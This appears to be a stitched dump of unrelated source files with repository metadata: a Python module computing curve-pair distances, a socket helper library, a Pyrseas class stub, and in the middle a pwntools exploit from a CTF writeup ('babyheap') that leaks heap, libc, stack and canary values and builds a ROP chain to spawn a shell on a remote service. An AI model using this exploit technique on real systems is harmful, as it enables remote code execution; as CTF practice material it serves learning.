# print '''The complement contains a polygon which shares an edge with
# itself, and so is distance 3. '''
# If any face is larger than the number of vertices, it will definitely
# Share an edge with itself. Therefore distance three.
faceSizeTest = [face[0] > M.shape[1] for face in Faces]
if True in faceSizeTest:
three = 1
# print '''The complement contains a polygon which shares an edge with
# itself, and so is distance 3. '''
if fourgonTest(Bridges, Islands):
three = 1
if lengthCheck != 2*M.shape[1]:
three = 1
# print '''The complement contains a polygon which shares an edge with
# itself, and so is distance 3. '''
# See function faceParse
# If this is true, then some face is sharing an edge with itself.
# It can't be a four-gon, since that would mean we have a multi-curve.
# So it must be an island, which means that there is a curve
# in the complement which is distance two. Thus the original pair is
# Distance three.
if faces_share_two_edges(islandFaces):
three = 1
# print ''' Found two faces that share multiple edges: A curve that
# intersects the non-reference curve only two times has been
# found. This curve cannot fill and so the pair is distance 3.
# '''
# Means there is a path of length two.
# Since a curve pair with two intersections cannot fill on any genus >1 ,
# The two curves will be distance three.
#Find linking edge paths in "mesh"
faces = list(bridgeFaces)
faces += islandFaces
#Build paths into curves and intersect with alpha
matrixList = build_matrices(edgePaths, allPaths)
genusTest, matrixLibrary = test_collection(matrixList, originalGenus)
if three != 1:
three = 1 if False in genusTest else 0
# Output
returnVals = [three, matrixLibrary]
return returnVals
def ladder_convert(ladder_top, ladder_bottom):
#print ladderTop, ladderBottom
n = len(ladder_top)
newTop = [' ']*n
newBottom = list(newTop)
for j in range(1, n+1):
if j in ladder_top and j in ladder_bottom:
newTop[ladder_top.index(j)] = ladder_bottom.index(j)
newBottom[ladder_bottom.index(j)] = ladder_top.index(j)
elif j in ladder_top:
ladderTopTemp = list(ladder_top)
            indices = [ladder_top.index(j)]
            ladderTopTemp[indices[0]] = None  # stand-in for ladderTopTemp.remove(j)
indices.append(ladderTopTemp.index(j))
newTop[indices[0]] = indices[1]
newTop[indices[1]] = indices[0]
elif j in ladder_bottom:
ladderBottomTemp = list(ladder_bottom)
            indices = [ladder_bottom.index(j)]
            ladderBottomTemp[indices[0]] = None  # stand-in for ladderBottomTemp.remove(j)
indices.append(ladderBottomTemp.index(j))
newBottom[indices[0]] = indices[1]
newBottom[indices[1]] = indices[0]
return newTop, newBottom
def ladder_is_multicurve(top, bottom):
n = len(top)
j0 = top[0]
counter = 1
j = bottom[0]
bottom[0] = None
oldIndex = 0
while j != j0:
old_j = j
if j in top:
nextIndex = top.index(j)
j = bottom[nextIndex]
if None in top:
top[top.index(None)] = old_j
elif None in bottom:
bottom[bottom.index(None)] = old_j
bottom[nextIndex] = None
elif j in bottom:
nextIndex = bottom.index(j)
j = top[nextIndex]
if None in top:
top[top.index(None)] = old_j
elif None in bottom:
bottom[bottom.index(None)] = old_j
top[nextIndex] = None
counter += 1
if None in top:
top[top.index(None)] = j
elif None in bottom:
bottom[bottom.index(None)] = j
return 1 if counter != n else 0
def matrix_is_multicurve(beta):
top = beta[0]
bottom = beta[1]
index = 0
j = top[index]
    start = 100  # sentinel so the while-loop body executes at least once
counter = 0
while j != start:
counter += 1
start = top[0]
if top[j] == index :
next_index = j
j = bottom[j]
index = next_index
elif bottom[j] == index:
next_index = j
j = top[j]
index = next_index
if top[j] == bottom[j]: return True
#print 'j', j,'next_index: ', index
return False if counter == len(top) else True
def test_permutations(original_ladder):
distance4 = []
distance3 = []
#from curvepair import CurvePair
ladder = deepcopy(original_ladder)
    if original_ladder is not None:
for i in range(len(ladder[0])):
if not ladder_is_multicurve(*ladder):
perm = CurvePair(*ladder)
else:
perm = None
            if perm is not None:
                if perm.distance == 4:
distance4.append(deepcopy(perm))
else:
distance3.append(deepcopy(perm))
else: pass
first_vertex = ladder[0].pop(0)
ladder[0].append(first_vertex)
if len(distance4) == 0:
print ' Found no distance four permutations of the ladder. '
if distance3:
print 'Distance 3 single curves: '
for curve in distance3:
print 'top : ', curve.ladder[0]
print 'bottom: ', curve.ladder[1]
if distance4:
print 'Distance 4+ single curves: '
for curve in distance4:
print 'top : ', curve.ladder[0]
print 'bottom: ', curve.ladder[1]
return distance4
else:
print "You didn't give me a ladder! "
return []
def test_perms(original_ladder):
distance4 = []
distance3 = []
ladder_to_perm = deepcopy(original_ladder)
#from curvepair import CurvePair
    if original_ladder is not None:
for i in range(len(ladder_to_perm[0])):
if not ladder_is_multicurve(*ladder_to_perm):
perm = CurvePair(*deepcopy(ladder_to_perm))
else:
perm = None
            if perm is not None:
                if perm.distance != 3:
distance4.append(perm)
else:
distance3.append(perm)
else: pass
first_vertex = ladder_to_perm[0].pop(0)
ladder_to_perm[0].append(first_vertex)
return distance3, distance4
#4+2-3-5-1+
#[1,2,3,2,4]
#[5,3,4,1,5]
#1-6+4-2+5-7+3+
#[7,4,7,2,4,2,6]
#[1,3,6,3,5,1,5]
#2+5-7+3+1-6+4-
#[4,1,4,6,1,6,3]
#[5,7,3,7,2,5,2]
def ladder_to_cycle(ladder_top, ladder_bottom):
locations = {arc: {'top': [], 'bottom': []} for arc in set(ladder_top + ladder_bottom)}
for loc, varc in enumerate(ladder_top):
locations[varc]['top'].append(loc)
for loc, varc in enumerate(ladder_bottom):
locations[varc]['bottom'].append(loc)
n = len(ladder_top)
cycle = ''
#arbitrarily orient them positively
orientation = '+'
current = 'top'
start = 1
prev_loc = (ladder_top+ladder_bottom).index(start) % n
for i in range(n):
#get the top and bottom of the current vertex
top = locations[start]['top']
bottom = locations[start]['bottom']
# if there is an endpoint on both the top and bottom,
# then orientation is preserved and the location is simply
# whatever hasn't already been used. We switch side of the
# ladder accordingly
if top and bottom:
# switch side of ladder
current = 'top' if current == 'bottom' else 'bottom'
# preserve orientation
orientation = '-' if orientation == '-' else '+'
            # get the locations available there
locs = locations[start][current]
cycle += str(locs[0]+1) + orientation
if current == 'bottom':
start = ladder_top[locs[0]]
if current == 'top':
start = ladder_bottom[locs[0]]
prev_loc = locs[0]
current = 'top' if current == 'bottom' else 'bottom'
elif not top:
current = 'bottom'
orientation = '-' if orientation == '+' else '+'
locs = locations[start][current]
t = set(locs)
t.remove(prev_loc)
current_loc = t.pop()
cycle += str(current_loc+1)+orientation
start = ladder_top[current_loc]
prev_loc = current_loc
current = 'top'
elif not bottom:
current = 'top'
orientation = '-' if orientation == '+' else '+'
locs = locations[start][current]
t = set(locs)
t.remove(prev_loc)
current_loc = t.pop()
cycle += str(current_loc+1)+orientation
start = ladder_bottom[current_loc]
prev_loc = current_loc
current = 'bottom'
return cycle
def cycle_to_ladder(cycle_rep):
arcs = [int(i) for i in re.split('[-+]', cycle_rep)[:-1]]
n = len(arcs)
signs = re.split('[0-9]+', cycle_rep)[1:]
top = [0 for i in range(len(arcs))]
bottom = [0 for i in range(len(arcs))]
ladder = [top, bottom]
ladder_index = 0
for i in range(1, len(arcs)+1):
current_sign = signs.pop(0)
current_v = arcs.pop(0)
if current_sign == '+':
ladder[0][current_v-1] = i
if i == 1:
ladder[1][current_v-1] = n#((i - 2) % n)
else:
ladder[1][current_v-1] = ((i - 1) % n)
if current_sign == '-':
ladder[1][current_v-1] = i
if i == 1:
ladder[0][current_v-1] = n#((i - 2) % n)
else:
ladder[0][current_v-1] = ((i - 1) % n)
return ladder
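# Usage sketch for the two representation converters above (sample data taken
# from the comments above; the exact output depends on the orientation
# conventions used by these helpers):
#
#   top, bottom = cycle_to_ladder('4+2-3-5-1+')
#   cycle = ladder_to_cycle(top, bottom)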
#import numpy as np
#from curves import fix_matrix_signs, boundary_count, genus, ladder_convert, vector_solution, edges, Three
from graph import Graph
class CurvePair:
'''
ladder = None
beta = None
top = []
bottom = []
n = 0
matrix = None
boundaries = None
genus = None
edges = None
solution = None
distance = 0
loops = []
'''
def __init__(self, top_beta, bottom_beta, dist=1, conjectured_dist=3,recursive=False):
is_ladder = lambda top, bottom: not (0 in top or 0 in bottom)
if is_ladder(top_beta, bottom_beta):
self.ladder = [top_beta, bottom_beta]
else:
self.ladder = None
if is_ladder(top_beta, bottom_beta):
self.beta = ladder_convert(top_beta, bottom_beta)
self.top = self.beta[0]
self.bottom = self.beta[1]
else:
self.top = top_beta
self.bottom = bottom_beta
self.beta = [self.top, self.bottom]
self.n = len(self.top)
        # For each vertex i: [previous vertex, top connection, next vertex, bottom connection]
        self.matrix = np.zeros((2,self.n,4))
self.matrix[0,:,0] = [self.n-1] + range(self.n-1)
self.matrix[0,:,1] = self.top
self.matrix[0,:,2] = range(1,self.n) +[0]
self.matrix[0,:,3] = self.bottom
self.matrix = fix_matrix_signs(self.matrix)
self.boundaries = boundary_count(self.matrix)
self.genus = genus(self.matrix)
self.edges = edges(self.matrix)
#self.arc_boundary = self.edges[1]
self.solution = vector_solution(self.edges[0])
self.loops = []
self.dist = dist
self.conjectured_dist = conjectured_dist
self.computed_distance = False
self.recursive = recursive
@property
def distance(self):
        if self.computed_distance is False:
            if self.dist == 1:
graph = Graph(self.edges, rep_num=self.conjectured_dist-2)
graph.compute_loops(self.n, self.genus)
self.loops = graph.gammas
#stderr.write(str(self.loops)+'\n')
self.computed_distance, self.loop_matrices = self.compute_distance(self.matrix, self.loops, recursive=self.recursive)
else:
self.computed_distance = None
return self.computed_distance
else:
return self.computed_distance
def __repr__(self):
return str(self.ladder[0])+'\n'+str(self.ladder[1])+'\n'
def compute_distance(self, M, all_paths,recursive=True):
'''
:param M: the matrix
:type M:
:param all_paths:
:type all_paths:
:returns: dist: the distance if three/four, or 'Higher' if dist is > 4.
Computes the distance between the two curves embedded in the matrix.
If this distance is three, tries to use simple paths to extend the distance
in a different direction. If this fails, simply returns three;
else it prints a curve that is distance four from alpha.
'''
dist_is_three, lib = Three(M, all_paths, originalGenus=self.genus, boundaries=self.boundaries, edges=self.edges)
dist = 3 if dist_is_three else 'at least 4!'
if dist == 3:
return dist, lib
else:
if recursive:
geodesic_distances = []
for k, matrix in lib.iteritems():
#stderr.write(str(matrix))
if np.array_equal(matrix, self.matrix):
continue
elif self.solution == CurvePair(matrix[0, :, 1], matrix[0, :, 3],0).solution \
and len(self.matrix[0]) == len(matrix[0]):
continue
cc = CurvePair(matrix[0, :, 1], matrix[0, :, 3])
#stderr.write(str(k)+": "+str(cc.distance)+'\n')
geodesic_distances.append(cc.distance)
#print 'computed curve',k,'!'
#print '\n'
return min(set(geodesic_distances)) + 1, lib
else:
return dist, lib
| UTF-8 | Python | false | false | 35,397 | py | 27 | curves.py | 18 | 0.554962 | 0.538887 | 0 | 1,176 | 29.098639 | 182 |
hnoson/writeups | 2,070,174,259,004 | 46c8ed83b3f90d48bd85c7c5e2067c445e6e7f21 | 0f9b6a33a5e2ce627db75d1bcc34bc3f3674335b | /contrailctf/2019/babyheap/exploit.py | f190231f314a8665a0aba24bb9c33edeb99474a0 | []
| no_license | https://github.com/hnoson/writeups | 359a33b03286bab19359ad9b089e6f3bfe4fb708 | 05550e3c462108f6c5ba0b69f65694e2eb1dc9b3 | refs/heads/master | 2021-10-07T18:21:26.041101 | 2021-10-03T10:22:31 | 2021-10-03T10:22:31 | 119,823,623 | 7 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
from pwn import *
def write(size, data):
s.sendlineafter('>', '1')
s.sendlineafter('size :', str(size))
s.sendlineafter('data :', data)
def read(index):
s.sendlineafter('>', '2')
s.sendlineafter('index :', str(index))
return s.recvuntil('1. ')[:-3]
def free(index):
s.sendlineafter('>', '3')
s.sendlineafter('index :', str(index))
if len(sys.argv) == 1:
s = process('./babyheap', env = {'LD_PRELOAD': './libc.so.6'})
else:
s = remote('114.177.250.4', 2223)
elf = ELF('./babyheap')
libc = ELF('./libc.so.6')
write(0x18, 'A')
free(0)
free(0)
heap_base = u64(read(0).ljust(8, '\0')) - 0x2280
log.info('heap base: %#x' % heap_base)
libc_base = u64(read((0x400560 - (heap_base + 0x260)) // 8).ljust(8, '\0')) - libc.symbols['free']
libc.address = libc_base
log.info('libc base: %#x' % libc_base)
write(0x18, p64(libc.symbols['environ']))
stack_addr = u64(read((0x2280 - 0x260) // 8)[:6].ljust(8, '\0'))
log.info('stack address: %#x' % stack_addr)
write(0x28, p64(stack_addr - 0x11f))
canary = u64('\0' + read((0x22a0 - 0x260) // 8)[:7])
log.info('canary: %#x' % canary)
pop_rdi = libc_base + 0x2155f
ret = 0x400666
payload = ''
payload += 'A' * 0x108
payload += p64(canary)
payload += 'A' * 0x18
payload += p64(pop_rdi) + p64(libc.search('/bin/sh\0').next())
payload += p64(ret)
payload += p64(libc.symbols['system'])
write(0x28, payload)
s.interactive()
| UTF-8 | Python | false | false | 1,420 | py | 219 | exploit.py | 200 | 0.607746 | 0.51831 | 0 | 52 | 26.307692 | 98 |
benjcleveland/python | 8,959,301,818,881 | 1ec1e3fed8dc7a1b0697cea11a6429afb661f029 | 65247ead0579a21f980911f19fb66c5ddda77954 | /assignment1/libsocket.py | d818ed47ec8a4a5aac21522dcf9bc473a284eb53 | []
| no_license | https://github.com/benjcleveland/python | e8169e696768b835800a09e529a1af69da0755c2 | 992f62d451f0ee8537dcdce6fa7155cfba46b639 | refs/heads/master | 2021-01-18T19:22:21.555804 | 2011-03-15T02:04:23 | 2011-03-15T02:04:23 | 1,244,221 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
'''
Module for socket functions that are shared between the client and server
Author - Ben Cleveland
'''
import socket
HEADER_LENGTH = 16
def create_listen_socket(host, port):
'''
Creates a listen socket on the given hostname and port
returns the created socket
'''
# create the socket
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
# bind to the port
sock.bind((host,port))
sock.listen(5)
# return the created socket
return sock
def create_connection(host, port):
'''
Creates a client socket connection to the given hostname and port
Returns the created socket
'''
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
return sock
def send_number( conn, num ):
'''
    Sends a given number over the socket connection
'''
# figure out the header size
header_size = '%016d' % len(str(num))
# send the header
conn.send(header_size)
# send the number
conn.send(str(num))
def send_exit( conn ):
'''
Client sends this message (header size of -1) to the server telling it the client is done
'''
header_size = '%016d' % -1
conn.send(header_size)
def recv_header( conn ):
'''
    Receives the message header from the socket
'''
status = 0
msg_length = read_socket( conn, HEADER_LENGTH)
if len(msg_length) != HEADER_LENGTH:
# error
print 'Invalid message header length(', len(msg_length), '), closing connection...'
status = -1
return (status, msg_length )
def recv_number( conn, size ):
'''
    Receives the number from the socket
'''
status = 0
# recv the number
number = read_socket( conn, size )
if len(number) != size:
# error
print 'Invalid number length', len(number), ', expected size', size, 'closing connection...'
status = -1
# try to convert the number to a float
try:
float(number)
except:
print 'Unable to convert number', number, 'closing connection...'
status = -1
return (status, number)
def read_socket( conn, size ):
'''
This function reads the given size from the socket and returns the data
'''
data = ''
while size > 0:
try:
data += conn.recv( size )
except:
data = ''
break
if( len(data) > 0 ):
size -= len(data)
else: # make sure the thread doesn't hang forever
break
return data
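# Protocol sketch (illustrative only): every number is framed by a 16-byte
# zero-padded ASCII header holding the payload length, followed by the payload
# itself; a header of -1 signals that the client is finished. A minimal client
# exchange built from the helpers above would be:
#
#   sock = create_connection('localhost', 8000)
#   send_number(sock, 3.14)   # peer calls recv_header() then recv_number()
#   send_exit(sock)
#   sock.close()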
if __name__ == '__main__':
print 'This module cannot be executed directly, exiting'
| UTF-8 | Python | false | false | 2,682 | py | 14 | libsocket.py | 10 | 0.591723 | 0.585011 | 0 | 119 | 21.537815 | 104 |
hiddenman/voip_utils | 12,189,117,215,408 | 6a14404967f3f34f625b1ec103c9bed5dbd3ae4f | 59558f38a9f05222f441a8ffd702d6e699e30e38 | /urls.py | b3df94e31a33051e441a303c0928f75e89032879 | []
| no_license | https://github.com/hiddenman/voip_utils | 5a92481be3b2951b049cf3d66ff07869af388bb9 | 9047a62233cb6a1526f21555968bee5fd4f6581d | refs/heads/master | 2022-01-18T17:55:06.712536 | 2019-06-01T22:52:23 | 2019-06-01T22:52:23 | 113,439,683 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.conf import settings
from django.conf.urls.defaults import *
from django.contrib import databrowse
from django.contrib.admin.views.decorators import staff_member_required
from rates.models import *
# The next two lines enable the admin and load each admin.py file:
from django.contrib import admin
admin.autodiscover()
databrowse.site.register(Country)
databrowse.site.register(Area)
databrowse.site.register(Operator)
databrowse.site.register(Rate)
databrowse.site.register(Target)
urlpatterns = patterns('',
(r'^$', 'voip_utils.rates.views.reports.redirect_to_admin'),
(r'^admin/rates_by_targets/$', 'voip_utils.rates.views.reports.rates_by_targets'),
(r'^admin/rates/rates_by_targets/$', 'voip_utils.rates.views.reports.rates_by_targets'),
(r'^admin/converter/$', 'voip_utils.rates.views.utilities.converter'),
(r'^admin/rates/converter/$', 'voip_utils.rates.views.utilities.converter'),
(r'^data/(.*)', staff_member_required(databrowse.site.root)),
(r'^admin/', include(admin.site.urls)),
)
| UTF-8 | Python | false | false | 1,145 | py | 50 | urls.py | 16 | 0.675983 | 0.675983 | 0 | 27 | 41.37037 | 108 |
MedIAIA/MedApp | 5,153,960,779,188 | f14a686b37121e4897449d31b9a62428d4a81c74 | e73ee0c73bbbd53db55fe5293e90532f5a82b160 | /digiez_api/views/web.py | 291382249798514c70eff3f0672c2cb55f8e931b | []
| no_license | https://github.com/MedIAIA/MedApp | ec7c81e4dd1661eaa197a9e58d12acfafc62fdc0 | 8dd1df1060cda108a53c534aa32ef81bb7b08168 | refs/heads/master | 2023-03-03T01:23:17.871688 | 2021-02-21T22:03:58 | 2021-02-21T22:03:58 | 341,014,421 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask import Blueprint, url_for, render_template
web = Blueprint('web', __name__, static_folder='../../front/templates')
@web.route('/')
def home():
return web.send_static_file('index.html')
| UTF-8 | Python | false | false | 205 | py | 30 | web.py | 22 | 0.663415 | 0.663415 | 0 | 9 | 21.666667 | 71 |
DancingOnAir/Leetcode_Python_Solution | 4,827,543,246,238 | 3bd38d5529f50f87620b9d417590088cb278034e | 122d1dae77e7e62d0bcdc42dbdf7d79d96df03ea | /DP/0818_race_car.py | 7bb133ebee76e67be1a2e79f500f46e300e0198f | []
| no_license | https://github.com/DancingOnAir/Leetcode_Python_Solution | fd26e012b90a1dab7afbfd10d2ce6dfffdd62799 | 238c6dcf791987d1070979f8f4dbc5aa6af17eda | refs/heads/master | 2023-04-11T14:58:07.859130 | 2023-04-10T16:05:49 | 2023-04-10T16:05:49 | 283,797,446 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from bisect import bisect_left
from collections import deque
class Solution:
    # simple BFS solution over (moves, position, velocity) states
def racecar(self, target: int) -> int:
# initialize as 0 moves, 0 position, +1 velocity
q = deque([(0, 0, 1)])
res = float('inf')
while q:
# (m) moves, (p) position, (v) velocity
m, p, v = q.popleft()
if p == target:
res = min(res, m)
if m >= res:
continue
q.append((m + 1, p + v, 2 * v))
if (p + v > target and v > 0) or (p + v < target and v < 0):
q.append((m + 1, p, -1 * v // abs(v)))
return res
def __init__(self):
self.memo = {0: 0}
# bottom-up dp
# https://leetcode.com/problems/race-car/discuss/227415/Figures-to-make-the-DP-solution-more-straightforward
def racecar3(self, target: int) -> int:
dp = [0] + [0x3f3f3f3f] * target
for i in range(1, target+1):
m, j = 1, 1
while j < i:
p, q = 0, 0
while p < j:
dp[i] = min(dp[i], m + 1 + q + 1 + dp[i - j + p])
q += 1
p = (1 << q) - 1
m += 1
j = (1 << m) - 1
dp[i] = min(dp[i], m + (0 if i == j else 1 + dp[j - i]))
return dp[target]
    # top-down recursion with memoization
def racecar2(self, target: int) -> int:
if target in self.memo:
return self.memo[target]
n = target.bit_length()
if 2 ** n - 1 == target:
self.memo[target] = n
else:
            self.memo[target] = self.racecar2(2**n - 1 - target) + n + 1
            for m in range(n - 1):
                self.memo[target] = min(self.memo[target], self.racecar2(target - 2**(n - 1) + 2**m) + n + m + 1)
return self.memo[target]
    # earlier attempt, but it fails
    # failing test case: for input 5, the target can be reached in only 7 steps (AARARAA)
def racecar1(self, target: int) -> int:
if not target:
return 0
memo = dict()
def min_steps(target):
if target in memo:
return memo[target]
arr = sorted(memo.keys())
pos = bisect_left(arr, target)
positive_diff = target - arr[pos - 1]
negative_diff = arr[pos] - target
step = min(memo[arr[pos - 1]] + min_steps(positive_diff) + 2, memo[arr[pos]] + min_steps(negative_diff) + 1)
memo[target] = step
return step
total, i, step = 0, 1, 0
while total < target:
total += i
i *= 2
step += 1
memo[total] = step
if target == total:
return step
return min(step + min_steps(total - target) + 1, step - 1 + min_steps(target - (total - i // 2)) + 2)
def test_race_car():
solution = Solution()
assert solution.racecar(3) == 2, 'wrong result'
assert solution.racecar(6) == 5, 'wrong result'
if __name__ == '__main__':
test_race_car()
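# Hand-checked traces behind the asserts above (A doubles the speed and moves,
# R reverses direction and resets the speed magnitude to 1):
#   target 3 -> "AA"    (0 -> 1 -> 3), 2 instructions
#   target 6 -> "AAARA" (0 -> 1 -> 3 -> 7, reverse, 7 -> 6), 5 instructions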
| UTF-8 | Python | false | false | 3,066 | py | 798 | 0818_race_car.py | 793 | 0.469341 | 0.444879 | 0 | 100 | 29.66 | 120 |
Talos-Laboratories/caramel | 7,687,991,486,600 | 1907c52b69bb62b097955ed064b59874853925e1 | e82d4b791fd21d7057944bcf9440401198008c27 | /caramel_test_suite.py | 7f4cc5fbfc196ffbf6c9c1de1aaf0b01f020edd4 | [
"MIT"
]
| permissive | https://github.com/Talos-Laboratories/caramel | e21e788be22c50789253b7ece42ff66af7016692 | 77464c68077fe0c646f71b30ea3c6da0ae2c2ef9 | refs/heads/master | 2016-09-13T18:05:23.213812 | 2016-05-16T04:50:00 | 2016-05-16T04:50:00 | 58,902,829 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from os import remove
import unittest
from caramel import Caramel
from caramel import DataConverterFactory
from caramel import DataFromList
from caramel import DataFromText
from caramel import DataFromFile
class CaramelTestSuite(unittest.TestCase):
def setUp(self):
self.sut = Caramel()
self.test_list = [['Key_col', 'Field_1', 'Field_2'],
['key_1', 'val_1_1', 'val_1_2'],
['key_2', 'val_2_1', 'val_2_2']]
self.test_text = ('Key_col, Field_1, Field_2\n'
'key_1, val_1_1, val_1_2\n'
'key_2, val_2_1, val_2_2')
self.test_file = 'caramel_test_file.txt'
self.helper_create_file(self.test_file, self.test_text)
def tearDown(self):
self.helper_remove_file(self.test_file)
@staticmethod
def helper_create_file(file_name, file_contents):
with open(file_name, 'w') as new_file:
new_file.write(file_contents)
@staticmethod
def helper_remove_file(file_name):
remove(file_name)
def test_data_from_list_first_value(self):
data_set = self.sut(self.test_list)
test_value = data_set['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_data_from_list_last_value(self):
data_set = self.sut(self.test_list)
test_value = data_set['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
def test_data_from_text_first_value(self):
data_set = self.sut(self.test_text)
test_value = data_set['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_data_from_text_last_value(self):
data_set = self.sut(self.test_text)
test_value = data_set['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
def test_data_from_file_first_value(self):
data_set = self.sut(self.test_file)
test_value = data_set['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_data_from_file_last_value(self):
data_set = self.sut(self.test_file)
test_value = data_set['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
class DataConverterFactoryTestSuite(unittest.TestCase):
def setUp(self):
self.sut = DataConverterFactory()
@staticmethod
def helper_create_file(file_name):
with open(file_name, 'w') as new_file:
new_file.write('Test File')
@staticmethod
def helper_remove_file(file_name):
remove(file_name)
def test_is_list_true(self):
sample = ['value_1', 'value_2']
test_value = self.sut._is_list(sample)
self.assertTrue(test_value)
def test_is_list_false(self):
sample = "value_1, value_2"
test_value = self.sut._is_list(sample)
self.assertFalse(test_value)
def test_is_file_true(self):
sample = 'test_file.txt'
self.helper_create_file(sample)
test_value = self.sut._is_file(sample)
self.assertTrue(test_value)
self.helper_remove_file(sample)
def test_is_file_false(self):
sample = 'test_file_2.txt'
test_value = self.sut._is_file(sample)
self.assertFalse(test_value)
def test_is_list_path(self):
sample = ['value_1', 'value_2']
test_object = self.sut(sample)
test_value = isinstance(test_object, DataFromList)
self.assertTrue(test_value)
def test_is_file_path(self):
sample = 'test_file_data_1.txt'
self.helper_create_file(sample)
test_object = self.sut(sample)
test_value = isinstance(test_object, DataFromFile)
self.assertTrue(test_value)
self.helper_remove_file(sample)
def test_is_text_path(self):
sample = 'Here is just some random text'
test_object = self.sut(sample)
test_value = isinstance(test_object, DataFromText)
self.assertTrue(test_value)
class DataFromListTestSuite(unittest.TestCase):
def setUp(self):
data_list = [['Key', 'Field_1', 'Field_2'],
['key_1', 'val_1_1', 'val_1_2'],
['key_2', 'val_2_1', 'val_2_2']]
self.sut = DataFromList(data_list)
def test_set_headers(self):
self.sut._set_headers()
validation_headers = ['Key', 'Field_1', 'Field_2']
test_headers = self.sut.headers
self.assertEqual(test_headers, validation_headers)
def test_read_all_table_rows_except_headers_first_value(self):
self.sut._set_headers()
self.sut._read_all_table_rows_except_headers()
test_value = self.sut.data_dictionary['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_read_all_table_rows_except_headers_last_value(self):
self.sut._set_headers()
self.sut._read_all_table_rows_except_headers()
test_value = self.sut.data_dictionary['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
def test_read_all_column_values_except_the_keys(self):
self.sut._set_headers()
validation_value = {'key_1':
{'Field_2': 'val_1_2',
'Field_1': 'val_1_1'}}
self.sut._read_all_column_values_except_the_keys(row=1)
test_value = self.sut.data_dictionary
self.assertEqual(test_value, validation_value)
def test_return_data_first_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_return_headers_last_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
class DataFromTextTestSuite(unittest.TestCase):
def setUp(self):
text = ("Key, Field_1, Field_2\n"
"key_1, val_1_1, val_1_2\n"
"key_2, val_2_1, val_2_2\n")
self.sut = DataFromText(text)
def test_clean_value_in_line(self):
test_value = self.sut._clean_value_in_line(' Dirty ')
validation_value = 'Dirty'
self.assertEqual(test_value, validation_value)
def test_clean_line(self):
dirty_line = [' 1', ' 2 ', ' 3', '4', ' 5']
self.sut._clean_line(dirty_line)
test_list = self.sut.data_list
validation_list = [['1', '2', '3', '4', '5']]
self.assertEqual(test_list, validation_list)
def test_split_each_line(self):
dirty_lines = [' 1, 2 , 3 ,4, 5',
' a, b , c ,d, e']
self.sut._split_each_line(dirty_lines)
test_list = self.sut.data_list
validation_list = [['1', '2', '3', '4', '5'],
['a', 'b', 'c', 'd', 'e']]
self.assertEqual(test_list, validation_list)
def test_return_data_first_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_return_headers_last_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
class DataFromFileTestSuite(unittest.TestCase):
def setUp(self):
self.file_name = 'test_data_from_file.txt'
self.helper_create_file()
self.sut = DataFromFile(self.file_name)
def helper_create_file(self):
text = ("Key, Field_1, Field_2\n"
"key_1, val_1_1, val_1_2\n"
"key_2, val_2_1, val_2_2\n")
with open(self.file_name, 'w') as new_file:
new_file.write(text)
def helper_remove_test_file(self):
remove(self.file_name)
def test_return_data_first_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_return_headers_last_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
self.helper_remove_test_file()
if __name__ == '__main__':
unittest.main()
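# The suite above exercises all three dispatch paths of DataConverterFactory
# (a summary sketch; Caramel instances are callable, as the tests show):
#   Caramel()([['K', 'F'], ['k1', 'v1']])  -> DataFromList
#   Caramel()('K, F\nk1, v1')              -> DataFromText
#   Caramel()('existing_file.txt')         -> DataFromFile (path must exist)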
| UTF-8 | Python | false | false | 8,874 | py | 3 | caramel_test_suite.py | 2 | 0.590376 | 0.573022 | 0 | 250 | 34.496 | 66 |
perseas/Pyrseas | 7,078,106,141,582 | ec4feb2d3729fd79b141a0f5631351cc6a5f74ba | 851c22930898a3050e0881b9e9b9705d1e22849e | /pyrseas/dbobject/extension.py | 8c4733f77d032e431ec3add9e30122eb6cb7ce76 | [
"BSD-3-Clause"
]
| permissive | https://github.com/perseas/Pyrseas | d54d71c3aafe70f65e38d9c568cfcd3ee9346b0b | ec682513d5256e383647f38f7fba29530cfb9fbe | refs/heads/master | 2023-07-06T01:51:37.469775 | 2023-07-05T15:38:22 | 2023-07-05T15:43:08 | 1,546,410 | 323 | 61 | BSD-3-Clause | false | 2023-04-27T18:58:06 | 2011-03-30T14:23:28 | 2023-04-27T00:36:44 | 2023-04-27T18:58:05 | 3,196 | 362 | 62 | 45 | Python | false | false | # -*- coding: utf-8 -*-
"""
pyrseas.dbobject.extension
~~~~~~~~~~~~~~~~~~~~~~~~~~
This module defines two classes: Extension derived from DbObject,
and ExtensionDict derived from DbObjectDict.
"""
from . import DbObjectDict, DbObject
from . import quote_id, commentable
class Extension(DbObject):
"""An extension"""
keylist = ['name']
single_extern_file = True
catalog = 'pg_extension'
